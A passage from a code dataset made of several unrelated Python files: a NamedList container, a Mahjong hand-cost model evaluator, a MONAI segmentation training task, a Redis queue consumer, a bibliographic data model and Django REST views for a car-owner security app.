1))\n\n def __setitem__(self, key, value):\n \"\"\"\n ::\n\n my_named_list = NamedList([\n (\"foo\", \"bar\"),\n (\"bar\", \"foo\"),\n (\"foo\", 1),\n (\"bar\", NamedList([(\"tholomew\", 5)]))\n ])\n\n my_named_list[\"bar\"] = [3]\n # NamedList([(\"foo\", \"bar\"), (\"foo\", 1), (\"bar\", 3)])\n\n my_named_list[1] = \"bacon\"\n # NamedList([(\"foo\", \"bar\"), (\"foo\", \"bacon\"), (\"bar\", 3)])\n\n my_named_list[:2] = [1, 2]\n # NamedList([(\"foo\", 1), (\"foo\", 2), (\"bar\", 3)])\n \"\"\"\n with self._lock:\n if isinstance(key, six.string_types):\n # Replace name\n if not hasattr(value, '__iter__'):\n raise TypeError(\"value not iterable\")\n if key in self:\n del self[key]\n for v in value:\n self.append(key, v)\n\n elif isinstance(key, six.integer_types):\n # Replace index\n key = self._negative_index_to_positive(key)\n if key >= len(self):\n raise IndexError(\"%s exceeds %s size\" % (str(key), self.__class__.__name__))\n self.data[key] = value\n\n elif isinstance(key, slice):\n # Replace slice\n indices = range(*key.indices(len(self)))\n if len(indices) != len(value):\n raise ValueError(\"can only replace slice with list of same size\")\n for i in range(len(indices)):\n self[i] = value[i]\n\n else:\n raise TypeError(\"key must be string, int, or slice\")\n\n def __setslice__(self, i, j, value):\n with self._lock:\n self.__setitem__(slice(i, j, 1), value)\n\n def __delitem__(self, key):\n \"\"\"\n ::\n\n del my_named_list[0] # delete element at index 0\n del my_named_list[\"foo\"] # delete all elements with name \"foo\"\n del my_named_list[1:3] # delete elements 1 and 2\n \"\"\"\n with self._lock:\n if isinstance(key, six.string_types):\n # Remove all keys with this name\n if key not in self._index:\n raise KeyError(key)\n indices = self._index[key][::-1] # Delete in reverse order\n for index in indices:\n del self[index]\n\n elif isinstance(key, six.integer_types):\n # Remove item at index\n name = self._rindex.pop(key)\n if name not in self._index:\n raise IndexError(\"%s assignment index out of range\" % (self.__class__.__name__,))\n\n # We'll have to shift all the indexes after ``key`` down by 1\n to_downshift = dict((i, self._rindex[i]) for i in range(key + 1, len(self)))\n\n index = self._index[name]\n index.remove(key)\n if not index:\n del self._index[name]\n del self.data[key]\n\n # Shift higher indexes down by 1\n for index, name in six.iteritems(to_downshift):\n minus_one = index - 1\n\n # _index\n index_list = self._index[name]\n index_list.remove(index)\n insort_left(index_list, minus_one)\n\n # _rindex\n del self._rindex[index]\n self._rindex[minus_one] = name\n\n elif isinstance(key, slice):\n # Remove by slice\n indices = key.indices(len(self))\n indices = [indices[1] - 1, indices[0] - 1, -1] # delete in reverse order\n for i in range(*indices):\n del self[i]\n\n else:\n raise TypeError(\"key must be a string, int, or slice\")\n\n def __delslice__(self, i, j):\n with self._lock:\n self.__delitem__(slice(i, j, 1))\n\n def __eq__(self, other):\n if isinstance(other, NamedList):\n if len(self) != len(other):\n return False\n for x, y in zip(self.items(), other.items()):\n if x != y:\n return False\n return True\n return False\n\n def __repr__(self):\n return \"%s(%s)\" % (self.__class__.__name__, repr(list(self.items())))\n","sub_path":"solrj/util/namedlist.py","file_name":"namedlist.py","file_ext":"py","file_size_in_byte":14669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"325915605","text":"import json\nimport logging\nimport os\n\nimport numpy as np\nfrom agari_riichi_cost.protocol import AgariRiichiCostProtocol\nfrom base.model import Model\nfrom hickle import hickle\nfrom mahjong.constants import EAST, SOUTH\nfrom mahjong.hand_calculating.hand_config import HandConfig\nfrom mahjong.hand_calculating.scores import ScoresCalculator\nfrom sklearn.metrics import accuracy_score, mean_squared_error, precision_recall_fscore_support\n\nlogger = logging.getLogger(\"logs\")\n\n\nclass AgariRiichiCostModel(Model):\n model_attributes = {\n \"optimizer\": \"adam\",\n \"loss\": \"sparse_categorical_crossentropy\",\n \"metrics\": [\"accuracy\"],\n }\n\n output = \"softmax\"\n units = 1024\n batch_size = 512\n\n input_size = AgariRiichiCostProtocol.input_size\n output_size = AgariRiichiCostProtocol.output_size\n\n def print_best_result(self):\n best_result = sorted(self.after_epoch_attrs, key=lambda x: x[\"empirical\"], reverse=True)[0]\n logger.info(\"Best result\")\n logger.info(json.dumps(best_result, indent=2))\n\n def calculate_predictions(self, model, epoch):\n real_indices = []\n predicted_indices = []\n\n data_files = os.listdir(self.data_path)\n correct_predictions = 0\n border_30_correct_predictions = 0\n border_20_correct_predictions = 0\n border_10_correct_predictions = 0\n for f in data_files:\n if not f.startswith(\"test_\"):\n continue\n\n test_file_path = os.path.join(self.data_path, f)\n test_data = hickle.load(test_file_path)\n test_input = np.asarray(test_data[\"input_data\"]).astype(\"float32\")\n test_verification = test_data[\"verification_data\"]\n\n predictions = model.predict(test_input, verbose=1)\n logger.info(\"predictions shape = {}\".format(predictions.shape))\n\n for i, prediction in enumerate(predictions):\n original_cost, han, fu, is_dealer = test_verification[i]\n\n key = AgariRiichiCostProtocol.build_category_key(han, fu)\n real_index = AgariRiichiCostProtocol.HAND_COST_CATEGORIES[key]\n real_indices.append(real_index)\n\n predicted_index = np.argmax(prediction)\n predicted_key = sorted(\n [\n x[0]\n for x in AgariRiichiCostProtocol.HAND_COST_CATEGORIES.items()\n if x[1] == predicted_index\n ]\n )[-1]\n if \"-\" in predicted_key:\n han = int(predicted_key.split(\"-\")[0])\n fu = int(predicted_key.split(\"-\")[1])\n else:\n han = int(predicted_key)\n fu = 0\n\n predicted_indices.append(predicted_index)\n\n hand = ScoresCalculator()\n player_wind = is_dealer and EAST or SOUTH\n config = HandConfig(player_wind=player_wind)\n predicted_cost = hand.calculate_scores(han=han, fu=fu, config=config)[\"main\"]\n\n if is_dealer and self.is_dealer_hand_correctly_predicted(original_cost, predicted_cost):\n correct_predictions += 1\n\n if not is_dealer and self.is_regular_hand_correctly_predicted(original_cost, predicted_cost):\n correct_predictions += 1\n\n if self.error_border_predicted(original_cost, predicted_cost, 30):\n border_30_correct_predictions += 1\n\n if self.error_border_predicted(original_cost, predicted_cost, 20):\n border_20_correct_predictions += 1\n\n if self.error_border_predicted(original_cost, predicted_cost, 10):\n border_10_correct_predictions += 1\n\n assert len(real_indices) == len(predicted_indices)\n\n accuracy = accuracy_score(real_indices, predicted_indices)\n\n precision, recall, fscore, _ = precision_recall_fscore_support(\n real_indices, predicted_indices, average=\"macro\"\n )\n\n mean_squared_error_result = mean_squared_error(real_indices, predicted_indices)\n empirical_prediction = (correct_predictions / len(real_indices)) * 100\n border_30_correct_predictions = (border_30_correct_predictions / len(real_indices)) * 100\n border_20_correct_predictions = (border_20_correct_predictions / len(real_indices)) * 100\n border_10_correct_predictions = (border_10_correct_predictions / len(real_indices)) * 100\n\n logger.info(\"accuracy: {}\".format(accuracy))\n logger.info(\"precision: {}\".format(precision))\n logger.info(\"recall: {}\".format(recall))\n logger.info(\"fscore (more is better): {}\".format(fscore))\n logger.info(\"mean squared error: {}\".format(mean_squared_error_result))\n logger.info(f\"30%: {border_30_correct_predictions}\")\n logger.info(f\"20%: {border_20_correct_predictions}\")\n logger.info(f\"10%: {border_10_correct_predictions}\")\n logger.info(f\"empirical: {empirical_prediction}\")\n\n if epoch:\n self.after_epoch_attrs.append(\n {\n \"epoch\": epoch,\n \"accuracy\": accuracy,\n \"precision\": precision,\n \"recall\": recall,\n \"fscore\": fscore,\n \"mean_squared_error\": mean_squared_error_result,\n \"empirical\": empirical_prediction,\n \"30\": border_30_correct_predictions,\n \"20\": border_20_correct_predictions,\n \"10\": border_10_correct_predictions,\n }\n )\n\n def error_border_predicted(self, original_cost, predicted_cost, border_percentage):\n first_border = predicted_cost - round((predicted_cost / 100) * border_percentage)\n second_border = predicted_cost + round((predicted_cost / 100) * border_percentage)\n\n if first_border < original_cost < second_border:\n return True\n\n return False\n\n def is_dealer_hand_correctly_predicted(self, original_cost, predicted_cost):\n assert original_cost >= 2000\n\n if original_cost <= 3900 and predicted_cost <= 5800:\n return True\n\n if 3900 < original_cost <= 5800 and predicted_cost <= 7700:\n return True\n\n if 5800 < original_cost <= 7700 and 3900 <= predicted_cost <= 12000:\n return True\n\n if 7700 < original_cost <= 12000 and 5800 <= predicted_cost <= 18000:\n return True\n\n if 12000 < original_cost <= 18000 and 7700 <= predicted_cost <= 24000:\n return True\n\n if original_cost > 18000 and predicted_cost > 12000:\n return True\n\n return False\n\n def is_regular_hand_correctly_predicted(self, original_cost, predicted_cost):\n assert original_cost >= 1300\n\n if original_cost <= 2600 and predicted_cost <= 3900:\n return True\n\n if 2600 < original_cost <= 3900 and predicted_cost <= 5200:\n return True\n\n if 3900 < original_cost <= 5200 and 2600 <= predicted_cost <= 8000:\n return True\n\n if 5200 < original_cost <= 8000 and 3900 <= predicted_cost <= 12000:\n return True\n\n if 8000 < original_cost <= 12000 and 5200 <= predicted_cost <= 16000:\n return True\n\n if original_cost > 12000 and predicted_cost > 8000:\n return True\n\n return False\n","sub_path":"project/agari_riichi_cost/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"617003025","text":"# Copyright 2020 - 2021 MONAI Consortium\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport glob\nimport logging\nimport os\n\nimport torch\nfrom monai.handlers import MeanDice, from_engine\nfrom monai.inferers import SimpleInferer\nfrom monai.losses import DiceCELoss\nfrom monai.transforms import (\n Activationsd,\n AddChanneld,\n AsDiscreted,\n LoadImaged,\n Orientationd,\n RandFlipd,\n RandRotate90d,\n RandShiftIntensityd,\n Resized,\n ScaleIntensityRanged,\n Spacingd,\n ToNumpyd,\n ToTensord,\n)\n\nfrom monailabel.deepedit.handlers import TensorBoardImageHandler\nfrom monailabel.deepedit.multilabel.interaction import Interaction\nfrom monailabel.deepedit.multilabel.transforms import (\n AddGuidanceSignalCustomd,\n AddInitialSeedPointCustomd,\n FindAllValidSlicesCustomd,\n FindDiscrepancyRegionsCustomd,\n PosNegClickProbAddRandomGuidanceCustomd,\n SelectLabelsAbdomenDatasetd,\n SplitPredsLabeld,\n)\nfrom monailabel.tasks.train.basic_train import BasicTrainTask\n\nlogger = logging.getLogger(__name__)\n\n\nclass MyTrain(BasicTrainTask):\n def __init__(\n self,\n model_dir,\n network,\n description=\"Train DeepEdit model for 3D Images\",\n spatial_size=(128, 128, 64),\n target_spacing=(1.0, 1.0, 1.0),\n deepgrow_probability_train=0.5,\n deepgrow_probability_val=1.0,\n max_train_interactions=20,\n max_val_interactions=10,\n label_names=None,\n debug_mode=False,\n **kwargs,\n ):\n self._network = network\n self.spatial_size = spatial_size\n self.target_spacing = target_spacing\n self.deepgrow_probability_train = deepgrow_probability_train\n self.deepgrow_probability_val = deepgrow_probability_val\n self.max_train_interactions = max_train_interactions\n self.max_val_interactions = max_val_interactions\n self.label_names = label_names\n self.debug_mode = debug_mode\n\n super().__init__(model_dir, description, **kwargs)\n\n def network(self):\n return self._network\n\n def optimizer(self):\n return torch.optim.Adam(self._network.parameters(), lr=0.0001)\n # return torch.optim.AdamW(self._network.parameters(), lr=1e-4, weight_decay=1e-5)\n\n def loss_function(self):\n # return DiceLoss(to_onehot_y=True, softmax=True)\n return DiceCELoss(to_onehot_y=True, softmax=True)\n\n def get_click_transforms(self):\n return [\n Activationsd(keys=\"pred\", softmax=True),\n AsDiscreted(keys=\"pred\", argmax=True),\n ToNumpyd(keys=(\"image\", \"label\", \"pred\")),\n # Transforms for click simulation\n FindDiscrepancyRegionsCustomd(keys=\"label\", pred=\"pred\", discrepancy=\"discrepancy\"),\n PosNegClickProbAddRandomGuidanceCustomd(\n keys=\"NA\",\n guidance=\"guidance\",\n discrepancy=\"discrepancy\",\n probability=\"probability\",\n ),\n AddGuidanceSignalCustomd(keys=\"image\", guidance=\"guidance\"),\n #\n ToTensord(keys=(\"image\", \"label\")),\n ]\n\n def train_pre_transforms(self):\n return [\n LoadImaged(keys=(\"image\", \"label\"), reader=\"nibabelreader\"),\n SelectLabelsAbdomenDatasetd(keys=\"label\", label_names=self.label_names),\n # SingleModalityLabelSanityd(keys=(\"image\", \"label\"), label_names=self.label_names),\n AddChanneld(keys=(\"image\", \"label\")),\n Spacingd(keys=[\"image\", \"label\"], pixdim=self.target_spacing, mode=(\"bilinear\", \"nearest\")),\n Orientationd(keys=[\"image\", \"label\"], axcodes=\"RAS\"),\n # This transform may not work well for MR images\n ScaleIntensityRanged(\n keys=\"image\",\n a_min=-175,\n a_max=250,\n b_min=0.0,\n b_max=1.0,\n clip=True,\n ),\n RandFlipd(\n keys=(\"image\", \"label\"),\n spatial_axis=[0],\n prob=0.10,\n ),\n RandFlipd(\n keys=(\"image\", \"label\"),\n spatial_axis=[1],\n prob=0.10,\n ),\n RandFlipd(\n keys=(\"image\", \"label\"),\n spatial_axis=[2],\n prob=0.10,\n ),\n RandRotate90d(\n keys=(\"image\", \"label\"),\n prob=0.10,\n max_k=3,\n ),\n RandShiftIntensityd(\n keys=\"image\",\n offsets=0.10,\n prob=0.50,\n ),\n Resized(keys=(\"image\", \"label\"), spatial_size=self.spatial_size, mode=(\"area\", \"nearest\")),\n # Transforms for click simulation\n FindAllValidSlicesCustomd(keys=\"label\", sids=\"sids\"),\n AddInitialSeedPointCustomd(keys=\"label\", guidance=\"guidance\", sids=\"sids\"),\n AddGuidanceSignalCustomd(keys=\"image\", guidance=\"guidance\"),\n #\n ToTensord(keys=(\"image\", \"label\")),\n ]\n\n def train_post_transforms(self):\n # FOR DICE EVALUATION\n return [\n Activationsd(keys=\"pred\", softmax=True),\n AsDiscreted(\n keys=(\"pred\", \"label\"),\n argmax=(True, False),\n to_onehot=(True, True),\n n_classes=len(self.label_names),\n ),\n SplitPredsLabeld(keys=\"pred\"),\n # ToCheckTransformd(keys=\"pred\"),\n ]\n\n def val_pre_transforms(self):\n return [\n LoadImaged(keys=(\"image\", \"label\"), reader=\"nibabelreader\"),\n SelectLabelsAbdomenDatasetd(keys=\"label\", label_names=self.label_names),\n # SingleModalityLabelSanityd(keys=(\"image\", \"label\"), label_names=self.label_names),\n AddChanneld(keys=(\"image\", \"label\")),\n Spacingd(keys=[\"image\", \"label\"], pixdim=self.target_spacing, mode=(\"bilinear\", \"nearest\")),\n Orientationd(keys=[\"image\", \"label\"], axcodes=\"RAS\"),\n # This transform may not work well for MR images\n ScaleIntensityRanged(\n keys=(\"image\"),\n a_min=-175,\n a_max=250,\n b_min=0.0,\n b_max=1.0,\n clip=True,\n ),\n Resized(keys=(\"image\", \"label\"), spatial_size=self.spatial_size, mode=(\"area\", \"nearest\")),\n # Transforms for click simulation\n FindAllValidSlicesCustomd(keys=\"label\", sids=\"sids\"),\n AddInitialSeedPointCustomd(keys=\"label\", guidance=\"guidance\", sids=\"sids\"),\n AddGuidanceSignalCustomd(keys=\"image\", guidance=\"guidance\"),\n #\n AsDiscreted(keys=\"label\", to_onehot=True, num_classes=len(self.label_names)),\n ToTensord(keys=(\"image\", \"label\")),\n ]\n\n def val_inferer(self):\n return SimpleInferer()\n\n def train_iteration_update(self):\n return Interaction(\n deepgrow_probability=self.deepgrow_probability_train,\n transforms=self.get_click_transforms(),\n max_interactions=self.max_train_interactions,\n click_probability_key=\"probability\",\n train=True,\n label_names=self.label_names,\n )\n\n def val_iteration_update(self):\n return Interaction(\n deepgrow_probability=self.deepgrow_probability_val,\n transforms=self.get_click_transforms(),\n max_interactions=self.max_val_interactions,\n click_probability_key=\"probability\",\n train=False,\n label_names=self.label_names,\n )\n\n def train_key_metric(self):\n all_metrics = dict()\n all_metrics[\"train_dice\"] = MeanDice(output_transform=from_engine([\"pred\", \"label\"]), include_background=False)\n for _, (key_label, _) in enumerate(self.label_names.items()):\n if key_label != \"background\":\n all_metrics[key_label + \"_dice\"] = MeanDice(\n output_transform=from_engine([\"pred_\" + key_label, \"label_\" + key_label]), include_background=False\n )\n return all_metrics\n\n def val_key_metric(self):\n all_metrics = dict()\n all_metrics[\"val_mean_dice\"] = MeanDice(\n output_transform=from_engine([\"pred\", \"label\"]), include_background=False\n )\n for _, (key_label, _) in enumerate(self.label_names.items()):\n if key_label != \"background\":\n all_metrics[key_label + \"_dice\"] = MeanDice(\n output_transform=from_engine([\"pred_\" + key_label, \"label_\" + key_label]), include_background=False\n )\n return all_metrics\n\n def partition_datalist(self, request, datalist, shuffle=True):\n # Training images\n train_d = datalist\n\n # Validation images\n data_dir = \"/home/adp20local/Documents/Datasets/monailabel_datasets/multilabel_abdomen/NIFTI/val\"\n val_images = sorted(glob.glob(os.path.join(data_dir, \"imgs\", \"*.nii.gz\")))\n val_labels = sorted(glob.glob(os.path.join(data_dir, \"labels\", \"*.nii.gz\")))\n val_d = [{\"image\": image_name, \"label\": label_name} for image_name, label_name in zip(val_images, val_labels)]\n\n return train_d, val_d\n\n def train_handlers(self, output_dir, events_dir, evaluator, local_rank=0):\n handlers = super().train_handlers(output_dir, events_dir, evaluator, local_rank)\n if self.debug_mode and local_rank == 0:\n handlers.append(TensorBoardImageHandler(log_dir=events_dir))\n return handlers\n","sub_path":"sample-apps/deepedit_multilabel/lib/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"62090282","text":"import redis\nimport json\nimport time\nclass consumer():\n def __init__(self):\n self.client = redis.Redis()\n\n def readMessage(self):\n try:\n msg = json.loads(self.client.lrange('queue', 0, 0)[0])\n self.client.ltrim('queue', 1, -1)\n return msg\n except:\n return None\n\n def startReading(self, duration):\n tmp = self.readMessage()\n begin = time.time()\n while tmp != None and time.time() - begin < 10:\n print(tmp)\n time.sleep(0.1)\n tmp = self.readMessage()\n","sub_path":"solutions/wtiproj02/05/wtiproj02_consumer.py","file_name":"wtiproj02_consumer.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"206570046","text":"from Levenshtein import distance, jaro_winkler\nfrom collections import defaultdict\n\nclass DataObject(object):\n \"\"\"Abstract data model object that specific classes inherit from. Sets\n basic functions that allow writing/retrieving attributes.\"\"\"\n def __init__(self):\n pass\n\n def __setitem__(self, key, value):\n self.__dict__[key] = value\n\n def __getitem__(self, key):\n return self.__dict__[key]\n\n def getDictValue(self):\n \"\"\"Convert current object into a dict. Used for generating JSON objects\n and in other instances where a standard type is necessary.\"\"\"\n return vars(self)\n\n @classmethod\n def createFromDict(cls, **kwargs):\n \"\"\"Take a standard dict object and convert to an instance of the\n provided class. Allows for creation of new instances with arbitrary\n fields set\"\"\"\n record = cls()\n for field, value in kwargs.items():\n record[field] = value\n\n return record\n\n\nclass WorkRecord(DataObject):\n def __init__(self):\n super()\n self.identifiers = []\n self.instances = []\n self.subjects = []\n self.agents = []\n self.links = []\n self.measurements = []\n self.dates = []\n self.uuid = None\n self.license = None\n self.language = None\n self.title = None\n self.sub_title = None\n self.alt_titles = None\n self.sort_title = None\n self.rights_statement = None\n self.medium = None\n self.series = None\n self.seriesPosition = None\n self.primary_identifier = None\n\n def addIdentifier(self, **identifierDict):\n self.identifiers.append(Identifier.createFromDict(**identifierDict))\n\n def addInstance(self, **instanceDict):\n self.instances.append(InstanceRecord.createFromDict(**instanceDict))\n\n def addSubject(self, **subjectDict):\n self.subjects.append(Subject.createFromDict(**subjectDict))\n\n def addAgent(self, **agentDict):\n self.agents.append(Agent.createFromDict(**agentDict))\n\n def addMeasurement(self, **measurementDict):\n self.measurements.append(Measurement.createFromDict(**measurementDict))\n\n def addDate(self, **dateDict):\n self.dates.append(Date.createFromDict(**dateDict))\n\n\nclass InstanceRecord(DataObject):\n def __init__(self, title=None, language=None):\n super()\n self.title = title\n self.language = language\n self.sub_title = None\n self.alt_titles = []\n self.pub_place = None\n self.edition = None\n self.extent = None\n self.edition_statement = None\n self.table_of_contents = None\n self.copyright_date = None\n self.series = None\n self.series_position = None\n self.agents = []\n self.identifiers = []\n self.formats = []\n self.measurements = []\n self.subjects = []\n self.links = []\n self.dates = []\n\n def addIdentifier(self, **identifierDict):\n self.identifiers.append(Identifier.createFromDict(**identifierDict))\n\n def addSubject(self, **subjectDict):\n self.subjects.append(Subject.createFromDict(**subjectDict))\n\n def addFormat(self, **formatDict):\n self.formats.append(Format.createFromDict(**formatDict))\n\n def addLink(self, **linkDict):\n self.links.append(Link.createFromDict(**linkDict))\n\n def addDate(self, **dateDict):\n self.dates.append(Date.createFromDict(**dateDict))\n\n\nclass Format(DataObject):\n def __init__(self, content_type=None, link=None, modified=None):\n super()\n self.content_type = content_type\n self.modified = modified\n self.drm = None\n self.measurements = []\n self.links = []\n self.dates = []\n\n if (isinstance(link, Link)):\n self.links = [link]\n else:\n self.setLink(url=link)\n\n def setLink(self, **linkFields):\n newLink = Link.createFromDict(**linkFields)\n self.links = [newLink]\n\n\nclass Agent(DataObject):\n def __init__(self, name=None, role=None, aliases=None, birth=None, death=None, link=None):\n super()\n self.name = name\n self.sort_name = None\n self.lcnaf = None\n self.viaf = None\n self.biography = None\n if aliases is None:\n self.aliases = []\n else:\n self.aliases = aliases\n self.link = link\n self.dates = []\n\n if isinstance(role, (str, int)):\n self.roles = [role]\n else:\n self.roles = role\n\n # TODO This method is pretty ugly and there must be a better way to merge\n # agent records. However, it does work\n @staticmethod\n def checkForMatches(newAgents, agents):\n merged = defaultdict(dict)\n for agent in agents:\n merger = list(filter(lambda x: jaro_winkler(x['name'].lower(), agent['name'].lower()) > 0.8, newAgents))\n if(len(merger) > 0):\n mergedAgent = merger[0]\n merged[mergedAgent['name']] = Agent.mergeFromDict(agent, mergedAgent)\n else:\n merged[agent.name] = agent\n\n for newAgent in newAgents:\n if newAgent.name not in merged:\n merged[newAgent.name] = newAgent\n\n return merged.values()\n\n @staticmethod\n def mergeFromDict(otherAgent, agent):\n if isinstance(otherAgent, Agent):\n otherAgent = otherAgent.getDictValue()\n for key, value in otherAgent.items():\n if key == 'aliases' and agent.aliases is not None :\n agent['aliases'].extend(value)\n continue\n if key == 'roles':\n if isinstance(value, (str, int)):\n value = [value]\n agent['roles'].extend(value)\n if agent[key] is None:\n agent[key] = value\n return agent\n\n\nclass Identifier(DataObject):\n def __init__(self, source=None, identifier=None, weight=None):\n super()\n self.type = source\n self.identifier = identifier\n self.weight = weight\n\n\nclass Link(DataObject):\n def __init__(self, url=None, mediaType=None, flags=None):\n super()\n self.url = url\n self.media_type = mediaType\n self.content = None\n self.flags = flags\n self.thumbnail = None\n\n\nclass Subject(DataObject):\n def __init__(self, subjectType=None, value=None, weight=None):\n super()\n self.authority = subjectType\n self.subject = value\n self.uri = None\n self.weight = weight\n self.measurements = []\n\n def addMeasurement(self, **measurementDict):\n self.measurements.append(Measurement.createFromDict(**measurementDict))\n\n\nclass Measurement(DataObject):\n def __init__(self, quantity=None, value=None, weight=None, takenAt=None, sourceID=None):\n super()\n self.quantity = quantity\n self.value = value\n self.weight = weight\n self.taken_at = takenAt\n self.source_id = sourceID\n\n @staticmethod\n def getValueForMeasurement(measurementList, quantity):\n retMeasurement = list(filter(lambda x: x['quantity'] == quantity, measurementList))\n return retMeasurement[0]['value']\n\n\nclass Date(DataObject):\n def __init__(self, displayDate=None, dateRange=None, dateType=None):\n super()\n self.display_date = displayDate\n self.date_range = dateRange\n self.date_type = dateType\n","sub_path":"lib/dataModel.py","file_name":"dataModel.py","file_ext":"py","file_size_in_byte":7486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"133432515","text":"from django.http import HttpResponse, JsonResponse\nfrom rest_framework.decorators import api_view\nfrom rest_framework.parsers import JSONParser\nfrom vecurityapiapp.models import (\n CarOwner,\n Car,\n Guard\n)\nfrom vecurityapiapp.serializers import (\n CarOwnerSerializer,\n CarSerializer,\n AddCarSerializer,\n GuardSerializer\n)\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.http import Http404\nfrom django.utils.six import BytesIO\nfrom rest_framework.parsers import JSONParser\nimport pickle\n\n\n# When using functions/methods as views\n@api_view(['GET', 'POST'])\ndef car_owner_list(request, format=None):\n \"\"\"\n List all car owners, or create a new car owner.\n \"\"\"\n if request.method == 'GET':\n snippets = CarOwner.objects.all()\n serializer = CarOwnerSerializer(snippets, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n elif request.method == 'POST':\n data = JSONParser().parse(request)\n serializer = CarOwnerSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef car_owner_detail(request, pk, format=None):\n \"\"\"\n Retrieve, update or delete a code snippet.\n \"\"\"\n try:\n car_owner = CarOwner.objects.get(pk=pk)\n except CarOwner.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = CarOwnerSerializer(car_owner)\n return JsonResponse(serializer.data)\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = CarOwnerSerializer(car_owner, data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data)\n return JsonResponse(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n car_owner.delete()\n return HttpResponse(status=204)\n\n\n# Using classes as views\nclass CarOwnerList(APIView):\n \"\"\"\n List all car owners, or create a new car owner.\n \"\"\"\n\n def get(self, request, format=None):\n carowners = CarOwner.objects.all()\n serializer = CarOwnerSerializer(carowners, many=True)\n return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = CarOwnerSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n res = {\n 'msg': 'signup successful',\n 'error': 0,\n 'success': 1,\n 'id': serializer.data['id']\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_201_CREATED)\n else:\n res = {\n 'msg': 'signup unsuccessful',\n 'error': 1,\n 'success': 0,\n 'id': 0\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass CarOwnerDetail(APIView):\n \"\"\"\n Retrieve, update or delete a car owner instance.\n \"\"\"\n\n def get_object(self, pk):\n try:\n return CarOwner.objects.get(pk=pk)\n except CarOwner.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n carowner = self.get_object(pk)\n serializer = CarOwnerSerializer(carowner)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n carowner = self.get_object(pk)\n serializer = CarOwnerSerializer(carowner, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n carowner = self.get_object(pk)\n carowner.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass CarList(APIView):\n \"\"\"\n List all cars, or create a new car.\n \"\"\"\n\n def get(self, request, format=None):\n cars = Car.objects.all()\n serializer = CarSerializer(cars, many=True)\n return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = CarSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass CarDetail(APIView):\n \"\"\"\n Retrieve, update or delete a car owner instance.\n \"\"\"\n\n def get_object(self, pk):\n try:\n return Car.objects.get(pk=pk)\n except Car.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n car = self.get_object(pk)\n serializer = CarSerializer(car)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n car = self.get_object(pk)\n serializer = CarSerializer(car, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n car = self.get_object(pk)\n car.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass AddCar(APIView):\n def post(self, request, format=None):\n car_owner_id = request.data['owner_id']\n license_number = request.data['license_number']\n color = request.data['color']\n pdict = {\n 'car_owner_id': car_owner_id,\n 'license_number': license_number,\n 'color': color\n }\n\n serializer = AddCarSerializer(data=pdict)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass OwnerCars(APIView):\n def get(self, request, oid, format=None):\n cars = Car.objects.filter(car_owner_id=oid)\n serializer = CarSerializer(cars, many=True)\n print(cars)\n return Response(serializer.data)\n\n\nclass CarOwnerLogin(APIView):\n def post(self, request, format=None):\n email = request.data['email']\n password = request.data['password']\n if email and password:\n user = CarOwner.objects.filter(email=email).filter(password=password)\n if user.exists():\n res = {\n 'msg': 'Login successful',\n 'error': 0,\n 'success': 1,\n 'id': user[0].id\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_200_OK)\n else:\n res = {\n 'msg': 'Login unsuccessful',\n 'error': 1,\n 'success': 0,\n 'id': 0\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_400_BAD_REQUEST)\n else:\n res = {\n 'msg': 'No credentials found',\n 'error': 2,\n 'success': 0,\n 'id': 0\n }\n response = 